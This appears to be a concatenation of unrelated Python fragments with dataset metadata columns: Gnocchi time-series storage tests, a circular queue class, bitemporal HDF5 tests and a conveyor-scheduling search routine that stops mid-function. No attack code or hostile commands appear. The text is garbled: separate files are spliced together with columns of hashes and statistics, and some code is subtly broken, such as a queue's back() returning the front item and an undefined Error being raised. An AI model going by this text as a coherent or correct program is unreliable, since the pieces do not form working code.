self.metric = indexer.Metric(uuid.uuid4(), ap)
self.index.create_metric(self.metric.id, str(uuid.uuid4()),
apname)
# First store some points scattered across different splits
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
])
self.trigger_processing()
agg = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
self.assertEqual({
self.metric: {
agg: {
carbonara.SplitKey(numpy.datetime64(1451520000, 's'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64(1451736000, 's'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm')),
},
},
}, self.storage._list_split_keys({self.metric: [agg]}))
if self.storage.WRITE_FULL:
assertCompressedIfWriteFull = self.assertTrue
else:
assertCompressedIfWriteFull = self.assertFalse
aggregation = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(60, 's'),
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451736000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][aggregation][0]
assertCompressedIfWriteFull(
carbonara.AggregatedTimeSerie.is_compressed(data))
self.assertEqual({"mean": [
(datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
(datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
(datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
(datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
]}, self.storage.get_measures(self.metric, [aggregation]))
# Test what happens if we write garbage
self.storage._store_metric_splits({
self.metric: [
(carbonara.SplitKey(
numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm')),
aggregation, b"oh really?", None),
]})
# Now store brand new points that should force a rewrite of one of the
# split (keep in mind the back window size in one hour here). We move
# the BoundTimeSerie processing timeserie far away from its current
# range.
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 10, 16, 18, 45), 45),
incoming.Measure(datetime64(2016, 1, 10, 17, 12, 45), 46),
])
self.trigger_processing()
def test_updated_measures(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
incoming.Measure(datetime64(2014, 1, 1, 12, 7, 31), 42),
])
self.trigger_processing()
aggregations = (
self.metric.archive_policy.get_aggregations_for_method("mean")
)
self.assertEqual({"mean": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 55.5),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 55.5),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69),
(datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 42.0),
]}, self.storage.get_measures(self.metric, aggregations))
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 9, 31), 4),
incoming.Measure(datetime64(2014, 1, 1, 12, 12, 45), 44),
])
self.trigger_processing()
self.assertEqual({"mean": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
(datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 23.0),
(datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
]}, self.storage.get_measures(self.metric, aggregations))
aggregations = (
self.metric.archive_policy.get_aggregations_for_method("max")
)
self.assertEqual({"max": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 69),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 69.0),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
(datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 42.0),
(datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
]}, self.storage.get_measures(self.metric, aggregations))
aggregations = (
self.metric.archive_policy.get_aggregations_for_method("min")
)
self.assertEqual({"min": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 4),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 4),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
(datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 4.0),
(datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
]}, self.storage.get_measures(self.metric, aggregations))
def test_add_and_get_splits(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
incoming.Measure(datetime64(2014, 1, 1, 12, 7, 31), 42),
incoming.Measure(datetime64(2014, 1, 1, 12, 9, 31), 4),
incoming.Measure(datetime64(2014, 1, 1, 12, 12, 45), 44),
])
self.trigger_processing()
aggregations = (
self.metric.archive_policy.get_aggregations_for_method("mean")
)
self.assertEqual({"mean": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
(datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 23.0),
(datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
]}, self.storage.get_measures(self.metric, aggregations))
self.assertEqual({"mean": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
(datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
]}, self.storage.get_measures(
self.metric, aggregations,
from_timestamp=datetime64(2014, 1, 1, 12, 10, 0)))
self.assertEqual({"mean": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
(datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 23.0),
]}, self.storage.get_measures(
self.metric, aggregations,
to_timestamp=datetime64(2014, 1, 1, 12, 6, 0)))
self.assertEqual({"mean": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
(datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
]}, self.storage.get_measures(
self.metric, aggregations,
to_timestamp=datetime64(2014, 1, 1, 12, 10, 10),
from_timestamp=datetime64(2014, 1, 1, 12, 10, 10)))
self.assertEqual({"mean": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
]}, self.storage.get_measures(
self.metric, aggregations,
from_timestamp=datetime64(2014, 1, 1, 12, 0, 0),
to_timestamp=datetime64(2014, 1, 1, 12, 0, 2)))
self.assertEqual({"mean": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
]}, self.storage.get_measures(
self.metric, aggregations,
from_timestamp=datetime64(2014, 1, 1, 12),
to_timestamp=datetime64(2014, 1, 1, 12, 0, 2)))
aggregation_1h = (
self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'h'))
)
self.assertEqual({"mean": [
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
]}, self.storage.get_measures(
self.metric, [aggregation_1h],
from_timestamp=datetime64(2014, 1, 1, 12, 0, 0),
to_timestamp=datetime64(2014, 1, 1, 12, 0, 2)))
aggregation_5m = (
self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(5, 'm'))
)
self.assertEqual({"mean": [
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
]}, self.storage.get_measures(
self.metric, [aggregation_5m],
from_timestamp=datetime64(2014, 1, 1, 12, 0, 0),
to_timestamp=datetime64(2014, 1, 1, 12, 0, 2)))
self.assertEqual({"mean": []},
self.storage.get_measures(
self.metric,
[carbonara.Aggregation(
"mean", numpy.timedelta64(42, 's'), None)]))
def test_get_measure_unknown_aggregation(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
incoming.Measure(datetime64(2014, 1, 1, 12, 7, 31), 42),
incoming.Measure(datetime64(2014, 1, 1, 12, 9, 31), 4),
incoming.Measure(datetime64(2014, 1, 1, 12, 12, 45), 44),
])
aggregations = (
self.metric.archive_policy.get_aggregations_for_method("last")
)
self.assertRaises(
storage.MetricDoesNotExist,
self.storage.get_measures,
self.metric, aggregations)
def test_resize_policy(self):
name = str(uuid.uuid4())
ap = archive_policy.ArchivePolicy(name, 0, [(3, 5)])
self.index.create_archive_policy(ap)
m = self.index.create_metric(uuid.uuid4(), str(uuid.uuid4()), name)
m = self.index.list_metrics(attribute_filter={"=": {"id": m.id}})[0]
self.incoming.add_measures(m.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 0), 1),
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 5), 1),
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 10), 1),
])
self.trigger_processing([m])
aggregation = m.archive_policy.get_aggregation(
"mean", numpy.timedelta64(5, 's'))
self.assertEqual({"mean": [
(datetime64(2014, 1, 1, 12, 0, 0), numpy.timedelta64(5, 's'), 1),
(datetime64(2014, 1, 1, 12, 0, 5), numpy.timedelta64(5, 's'), 1),
(datetime64(2014, 1, 1, 12, 0, 10), numpy.timedelta64(5, 's'), 1),
]}, self.storage.get_measures(m, [aggregation]))
# expand to more points
self.index.update_archive_policy(
name, [archive_policy.ArchivePolicyItem(granularity=5, points=6)])
m = self.index.list_metrics(attribute_filter={"=": {"id": m.id}})[0]
self.incoming.add_measures(m.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 15), 1),
])
self.trigger_processing([m])
self.assertEqual({"mean": [
(datetime64(2014, 1, 1, 12, 0, 5), numpy.timedelta64(5, 's'), 1),
(datetime64(2014, 1, 1, 12, 0, 10), numpy.timedelta64(5, 's'), 1),
(datetime64(2014, 1, 1, 12, 0, 15), numpy.timedelta64(5, 's'), 1),
]}, self.storage.get_measures(m, [aggregation]))
# shrink timespan
self.index.update_archive_policy(
name, [archive_policy.ArchivePolicyItem(granularity=5, points=2)])
m = self.index.list_metrics(attribute_filter={"=": {"id": m.id}})[0]
aggregation = m.archive_policy.get_aggregation(
"mean", numpy.timedelta64(5, 's'))
self.assertEqual({"mean": [
(datetime64(2014, 1, 1, 12, 0, 10), numpy.timedelta64(5, 's'), 1),
(datetime64(2014, 1, 1, 12, 0, 15), numpy.timedelta64(5, 's'), 1),
]}, self.storage.get_measures(m, [aggregation]))
def test_resample_no_metric(self):
"""https://github.com/gnocchixyz/gnocchi/issues/69"""
aggregation = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(300, 's'))
self.assertRaises(storage.MetricDoesNotExist,
self.storage.get_measures,
self.metric,
[aggregation],
datetime64(2014, 1, 1),
datetime64(2015, 1, 1),
resample=numpy.timedelta64(1, 'h'))
| 45.129721
| 79
| 0.562036
| 6,092
| 54,968
| 4.980466
| 0.068122
| 0.058007
| 0.054382
| 0.055898
| 0.856992
| 0.833427
| 0.821034
| 0.803335
| 0.788174
| 0.762368
| 0
| 0.106902
| 0.303122
| 54,968
| 1,217
| 80
| 45.166804
| 0.685062
| 0.060963
| 0
| 0.727094
| 0
| 0.000985
| 0.026271
| 0.009216
| 0
| 0
| 0
| 0
| 0.137931
| 1
| 0.028571
| false
| 0.000985
| 0.015764
| 0.000985
| 0.046305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7db248952443c6d0ebcd4b59a7607dcacdbdeba3
| 4,524
|
py
|
Python
|
CS225/myCode/queue.py
|
debugevent90901/courseArchive
|
1585c9a0f4a1884c143973dcdf416514eb30aded
|
[
"MIT"
] | null | null | null |
CS225/myCode/queue.py
|
debugevent90901/courseArchive
|
1585c9a0f4a1884c143973dcdf416514eb30aded
|
[
"MIT"
] | null | null | null |
CS225/myCode/queue.py
|
debugevent90901/courseArchive
|
1585c9a0f4a1884c143973dcdf416514eb30aded
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
class Fifo:
def __init__(self, size=20):
self.items = [None] * size
self.first = 0
self.last = -1
self.size = size
self.length = 0
def computelength(self):
if self.last > self.first:
self.length = self.last - self.first + 1
else:
self.length = self.last - self.first + 1 + self.size
def isEmpty(self):
if self.length != 0:
return False
return True
def front(self):
if self.length != 0:
return self.items[self.first]
raise ValueError("Queue is empty")
def back(self):
if self.length != 0:
return self.items[self.first]
raise ValueError("Queue is empty")
def pushback(self, item):
if self.length == self.size:
self.allocate()
self.last = (self.last + 1) % self.size
self.items[self.last] = item
self.computelength()
def popfront(self):
if self.length == self.size // 4:
self.deallocate()
if self.length != 0:
frontelement = self.items[self.first]
self.first = (self.first + 1) % self.size
self.computelength()
return frontelement
raise ValueError("Queue is empty")
def allocate(self):
newlength = 2 * self.size
newQueue = [None] * newlength
for i in range(self.size):
pos = (i + self.first) % self.size
newQueue[i] = self.items[pos]
self.items = newQueue
self.first = 0
self.last = self.size - 1
self.size = newlength
self.computelength()
def deallocate(self):
newlength = self.size // 2
newQueue = [None] * newlength
length = self.length
for i in range(length):
pos = (i + self.first) % self.size
newQueue[i] = self.items[pos]
self.items = newQueue
self.first = 0
self.last = length - 1
self.size = newlength
self.computelength()
def __iter__(self):
rlast = self.first + self.length
for i in range(self.first, rlast):
yield self.items[i % self.size]
class Fifo_GRAPH:
def __init__(self, size=20):
self.items = [None] * size
self.first = 0
self.last = -1
self.size = size
self.length = 0
def computelength(self):
if self.last >= self.first:
self.length = self.last - self.first + 1
else:
# maybe is the same
#self.length = 0
self.length = self.last - self.first + 1 + self.size
def isEmpty(self):
if self.length != 0:
return False
return True
def front(self):
if self.length != 0:
return self.items[self.last]
raise Error("Queue is empty")
def back(self):
if self.length != 0:
return self.items[self.first]
raise Error("Queue is empty")
def pushback(self, item):
if self.length == self.size:
self.allocate()
self.last = (self.last + 1) % self.size
self.items[self.last] = item
self.computelength()
def popfront(self):
if self.length == self.size / 4:
self.deallocate()
if self.last - self.first + 1 != 0:
frontelement = self.items[self.last]
self.first = (self.first + 1) % self.size
self.computelength()
return frontelement
raise Error("Queue is empty")
def __iter__(self):
rlast = self.first + self.length
for i in range(self.first, rlast):
yield self.items[i % self.size]
def allocate(self):
newlength = 2 * self.size
newQueue = [None] * newlength
for i in range(self.size):
pos = (i + self.first) % self.size
newQueue[i] = self.items[pos]
self.items = newQueue
self.first = 0
self.last = self.size - 1
self.size = newlength
self.computelength()
def deallocate(self):
newlength = self.size / 2
newQueue = [None] * newlength
length = (self.last - self.first + 1) % self.size
for i in range(length):
pos = (i + self.first) % self.size
newQueue[i] = self.items[pos]
self.items = newQueue
self.first = 0
self.last = length - 1
self.size = newlength
self.computelength()
| 28.815287
| 64
| 0.531388
| 543
| 4,524
| 4.395948
| 0.099448
| 0.110599
| 0.049016
| 0.064097
| 0.969418
| 0.940092
| 0.914956
| 0.914956
| 0.905739
| 0.905739
| 0
| 0.01512
| 0.356764
| 4,524
| 156
| 65
| 29
| 0.805155
| 0.011936
| 0
| 0.893939
| 0
| 0
| 0.018809
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151515
| false
| 0
| 0
| 0
| 0.242424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dc40de9c452f1c21a0dc3b6419f4729dc50f0ac
| 3,075
|
py
|
Python
|
bth5/tests/test_dataset.py
|
Quansight/bitemporal-h5
|
faa323e25521381e3d770f48aa089ede1c7406fe
|
[
"BSD-3-Clause"
] | 3
|
2019-09-13T18:41:09.000Z
|
2019-09-14T02:58:49.000Z
|
bth5/tests/test_dataset.py
|
Quansight/bitemporal-h5
|
faa323e25521381e3d770f48aa089ede1c7406fe
|
[
"BSD-3-Clause"
] | 5
|
2019-09-05T14:21:59.000Z
|
2019-10-10T18:41:52.000Z
|
bth5/tests/test_dataset.py
|
Quansight/bitemporal-h5
|
faa323e25521381e3d770f48aa089ede1c7406fe
|
[
"BSD-3-Clause"
] | 2
|
2020-02-11T18:52:58.000Z
|
2021-04-17T15:39:04.000Z
|
"""tests basic dataset properties"""
import numpy as np
import bth5
import pytest
def test_write(tmp_path):
with bth5.open(tmp_path / "example.h5", "/", "w", value_dtype=np.float64) as ds:
ds.write(np.datetime64("2018-06-21 12:26:47"), 2.0)
ds.write(np.datetime64("2018-06-21 12:26:48"), 1.0)
with bth5.open(tmp_path / "example.h5", "/", "r") as ds:
assert_recordvalidequal(
ds.records[0], np.datetime64("2018-06-21 12:26:47"), 2.0
)
assert_recordvalidequal(
ds.records[1], np.datetime64("2018-06-21 12:26:48"), 1.0
)
assert_recordvalidequal(
ds.valid_times[np.datetime64("2018-06-21 12:26:47")],
np.datetime64("2018-06-21 12:26:47"),
2.0,
)
assert_recordvalidequal(
ds.valid_times[np.datetime64("2018-06-21 12:26:48")],
np.datetime64("2018-06-21 12:26:48"),
1.0,
)
records = ds.valid_times[
np.datetime64("2018-06-21 12:26:47") : np.datetime64("2018-06-21 12:26:49")
]
assert_recordvalidequal(records[0], np.datetime64("2018-06-21 12:26:47"), 2.0)
assert_recordvalidequal(records[1], np.datetime64("2018-06-21 12:26:48"), 1.0)
def test_invalid_order(tmp_path):
with bth5.open(tmp_path / "example.h5", "/", "w", value_dtype=np.float64) as ds:
ds.write(np.datetime64("2018-06-21 12:26:48"), 2.0)
ds.write(np.datetime64("2018-06-21 12:26:47"), 1.0)
with bth5.open(tmp_path / "example.h5", "/", "r") as ds:
assert_recordvalidequal(
ds.records[0], np.datetime64("2018-06-21 12:26:47"), 1.0
)
assert_recordvalidequal(
ds.records[1], np.datetime64("2018-06-21 12:26:48"), 2.0
)
def test_interpolate(tmp_path):
with bth5.open(tmp_path / "example.h5", "/", "w", value_dtype=np.float64) as ds:
ds.write(np.datetime64("2018-06-21 12:26:47"), 2.0)
ds.write(np.datetime64("2018-06-21 12:26:49"), 1.0)
with bth5.open(tmp_path / "example.h5", "/", "r") as ds:
assert ds.interpolate_values("2018-06-21 12:26:48") == 1.5
def test_deduplication(tmp_path):
with bth5.open(tmp_path / "example.h5", "/", "w", value_dtype=np.float64) as ds:
ds.write(np.datetime64("2018-06-21 12:26:47"), 2.0)
ds.write(np.datetime64("2018-06-21 12:26:49"), 1.0)
with bth5.open(tmp_path / "example.h5", "/", "a") as ds:
ds.write(np.datetime64("2018-06-21 12:26:49"), 3.0)
ds.write(np.datetime64("2018-06-21 12:26:51"), 1.0)
with bth5.open(tmp_path / "example.h5", "/", "r") as ds:
records = ds.valid_times[
np.datetime64("2018-06-21 12:26:47") : np.datetime64("2018-06-21 12:26:52")
]
assert len(records) == 3
assert_recordvalidequal(records[1], np.datetime64("2018-06-21 12:26:49"), 3.0)
def assert_recordvalidequal(record, valid_time, value):
assert record["valid_time"] == valid_time
assert record["value"] == value
assert record["transaction_id"] != -1
| 37.5
| 87
| 0.597724
| 485
| 3,075
| 3.705155
| 0.117526
| 0.086811
| 0.115748
| 0.144686
| 0.821925
| 0.821925
| 0.821925
| 0.813578
| 0.811352
| 0.811352
| 0
| 0.204252
| 0.219837
| 3,075
| 81
| 88
| 37.962963
| 0.54481
| 0.009756
| 0
| 0.333333
| 0
| 0
| 0.207634
| 0
| 0
| 0
| 0
| 0
| 0.238095
| 1
| 0.079365
| false
| 0
| 0.047619
| 0
| 0.126984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7de8143daa8501cfed6db699de304225f13e0203
| 17,483
|
py
|
Python
|
conveyor/method.py
|
cscUOU/Shipyard-process-optimization
|
cefddd2e953ab6b685771d3c388ae46c7d06bdf3
|
[
"Apache-2.0"
] | null | null | null |
conveyor/method.py
|
cscUOU/Shipyard-process-optimization
|
cefddd2e953ab6b685771d3c388ae46c7d06bdf3
|
[
"Apache-2.0"
] | null | null | null |
conveyor/method.py
|
cscUOU/Shipyard-process-optimization
|
cefddd2e953ab6b685771d3c388ae46c7d06bdf3
|
[
"Apache-2.0"
] | null | null | null |
def bubble_search(works):
works = np.array([work["time"] for work in works])
n_work, n_process_seq = works.shape
conveyor, conveyor_mask = get_conveyor(works)
_, n_seq = conveyor.shape
best_conveyor_time = cal_conveyor_time(conveyor)
performance = 0
_iter = 0
_time = 0
_n_effective = 0
best_iter = 0
best_time = 0
start_time = time.time()
while True:
tmp_best_conveyor_time = best_conveyor_time
for i in range(n_work-1):
_iter += 1
swap(works, conveyor, i, i+1)
tmp_conveyor_time = cal_conveyor_time(conveyor)
if best_conveyor_time > tmp_conveyor_time:
_n_effective += 1
best_iter = _iter
best_time = time.time() - start_time
best_conveyor_time = tmp_conveyor_time
else:
swap(works, conveyor, i, i+1)
if tmp_best_conveyor_time == best_conveyor_time:
break
else:
continue
performance = best_conveyor_time
_time = time.time() - start_time
return works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def random_search(works):
works = np.array([work["time"] for work in works])
works = np.array(works)
n_works, n_process_seq = works.shape
conveyor, conveyor_mask = get_conveyor(works)
_, n_seq = conveyor.shape
best_conveyor_time = cal_conveyor_time(conveyor)
best_works = np.copy(works)
index = np.arange(n_works)
performance = 0
_iter = 0
_time = 0
_n_effective = 0
best_iter = 0
best_time = 0
start_time = time.time()
for i in range(MAX_ITER):
_iter += 1
np.random.shuffle(index)
works = works[index]
conveyor, _ = get_conveyor(works)
tmp_conveyor_time = cal_conveyor_time(conveyor)
if best_conveyor_time > tmp_conveyor_time:
_n_effective += 1
best_iter = _iter
best_time = time.time() - start_time
best_conveyor_time = tmp_conveyor_time
best_works = np.copy(works)
performance = best_conveyor_time
_time = time.time() - start_time
return works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def random_bubble_search(works):
works = np.array([work["time"] for work in works])
works = np.array(works)
n_work, n_process_seq = works.shape
conveyor, conveyor_mask = get_conveyor(works)
_, n_seq = conveyor.shape
best_conveyor_time = cal_conveyor_time(conveyor)
best_works = np.copy(works)
index = np.arange(n_work)
performance = 0
_iter = 0
_time = 0
_n_effective = 0
best_iter = 0
best_time = 0
start_time = time.time()
for i in range(MAX_ITER):
np.random.shuffle(index)
works = works[index]
conveyor, conveyor_mask = get_conveyor(works)
tmp_best_conveyor_time = best_conveyor_time
_iter += 1
while True:
before_best_conveyor_time = tmp_best_conveyor_time
for i in range(n_work-1):
swap(works, conveyor, i, i+1)
tmp_conveyor_time = cal_conveyor_time(conveyor)
if tmp_best_conveyor_time >= tmp_conveyor_time:
_n_effective += 1
best_iter = _iter
best_time = time.time() - start_time
tmp_best_conveyor_time = tmp_conveyor_time
else:
swap(works, conveyor, i, i+1)
if before_best_conveyor_time == tmp_best_conveyor_time:
break
else:
continue
if best_conveyor_time > tmp_best_conveyor_time:
best_conveyor_time = tmp_best_conveyor_time
best_works = np.copy(works)
performance = best_conveyor_time
_time = time.time() - start_time
return works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def unidev_search_half(works):
if type(works[0]) is dict:
works = np.array([work["time"] for work in works])
else:
pass
works = np.array(works)
n_work, n_process_seq = works.shape
conveyor, conveyor_mask = get_conveyor(works)
_, n_seq = conveyor.shape
count = 0
process_count = np.sum(conveyor_mask, axis=0)
best_conveyor_time = cal_conveyor_time(conveyor)
performance = 0
_iter = 0
_time = 0
_n_effective = 0
best_iter = 0
best_time = 0
start_time = time.time()
time_collector = [[], [], []]
while True:
_iter += 1
time_collect = time.time()#
process_sum = np.sum(conveyor, axis=0)
process_mean = process_sum/process_count
#
# process_deviation = np.copy(conveyor)
# for i in range(n_seq):
## process_deviation[process_deviation[:, i]>0, i] -= process_mean[i]
# process_deviation[conveyor_mask[:, i]>0, i] -= process_mean[i]
# process_deviation = np.absolute(process_deviation)
#
# process_deviation_sum = np.sum(process_deviation, axis=0)
# process_deviation_mean = nan_to_zero(process_deviation_sum/process_count)
#
# seq_probability = roulette_wheel(process_deviation_mean)
## seq_probability = softmax(process_deviation_mean)
# seq_choice = np.random.choice(n_seq, 1, p=seq_probability)[0]
time_collector[0].append(time.time()-time_collect)#
time_collect = time.time()#
# work_index = [i for i, cm in enumerate(conveyor_mask[:, seq_choice]) if cm == 1]
# if len(work_index) == 1:
# work_choice = work_index[0]
# else:
# work_probability = roulette_wheel(process_deviation[conveyor_mask[:, seq_choice]>0, seq_choice])
# work_choice = np.random.choice(work_index, 1, p=work_probability)[0]
work_choice = np.random.choice(np.arange(n_work), 1)[0]
time_collector[1].append(time.time()-time_collect)#
time_collect = time.time()#
error_collect = []
for i in range(n_work):
error1 = sum(np.absolute(process_mean[i:i+n_process_seq] - works[work_choice]))
error2 = sum(np.absolute(process_mean[work_choice:work_choice+n_process_seq] - works[i]))
error_collect.append(error1+error2)
swap_probability = roulette_wheel(error_collect, True)
swap_choice = np.random.choice(range(n_work), 1, p=swap_probability)[0]
time_collector[2].append(time.time()-time_collect)#
swap(works, conveyor, work_choice, swap_choice)
count += 1
tmp_conveyor_time = cal_conveyor_time(conveyor)
if best_conveyor_time > tmp_conveyor_time:
_n_effective += 1
best_iter = _iter
best_time = time.time() - start_time
best_conveyor_time = tmp_conveyor_time
best_works = np.copy(works)
else:
swap(works, conveyor, work_choice, swap_choice)
if count == MAX_ITER:
break
performance = best_conveyor_time
_time = time.time() - start_time
return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time, time_collector]
def unidev_search(works):
if type(works[0]) is dict:
works = np.array([work["time"] for work in works])
else:
pass
works = np.array(works)
n_work, n_process_seq = works.shape
conveyor, conveyor_mask = get_conveyor(works)
_, n_seq = conveyor.shape
count = 0
process_count = np.sum(conveyor_mask, axis=0)
best_conveyor_time = cal_conveyor_time(conveyor)
performance = 0
_iter = 0
_time = 0
_n_effective = 0
best_iter = 0
best_time = 0
start_time = time.time()
time_collector = [[], [], []]
while True:
_iter += 1
time_collect = time.time()#
process_sum = np.sum(conveyor, axis=0)
process_mean = process_sum/process_count
process_deviation = np.copy(conveyor)
for i in range(n_seq):
# process_deviation[process_deviation[:, i]>0, i] -= process_mean[i]
process_deviation[conveyor_mask[:, i]>0, i] -= process_mean[i]
process_deviation = np.absolute(process_deviation)
process_deviation_sum = np.sum(process_deviation, axis=0)
process_deviation_mean = nan_to_zero(process_deviation_sum/process_count)
seq_probability = roulette_wheel(process_deviation_mean)
# seq_probability = softmax(process_deviation_mean)
seq_choice = np.random.choice(n_seq, 1, p=seq_probability)[0]
time_collector[0].append(time.time()-time_collect)#
time_collect = time.time()#
work_index = [i for i, cm in enumerate(conveyor_mask[:, seq_choice]) if cm == 1]
if len(work_index) == 1:
work_choice = work_index[0]
else:
work_probability = roulette_wheel(process_deviation[conveyor_mask[:, seq_choice]>0, seq_choice])
work_choice = np.random.choice(work_index, 1, p=work_probability)[0]
time_collector[1].append(time.time()-time_collect)#
time_collect = time.time()#
error_collect = []
for i in range(n_work):
error1 = sum(np.absolute(process_mean[i:i+n_process_seq] - works[work_choice]))
error2 = sum(np.absolute(process_mean[work_choice:work_choice+n_process_seq] - works[i]))
error_collect.append(error1+error2)
swap_probability = roulette_wheel(error_collect, True)
swap_choice = np.random.choice(range(n_work), 1, p=swap_probability)[0]
time_collector[2].append(time.time()-time_collect)#
swap(works, conveyor, work_choice, swap_choice)
count += 1
tmp_conveyor_time = cal_conveyor_time(conveyor)
if best_conveyor_time > tmp_conveyor_time:
_n_effective += 1
best_iter = _iter
best_time = time.time() - start_time
best_conveyor_time = tmp_conveyor_time
best_works = np.copy(works)
else:
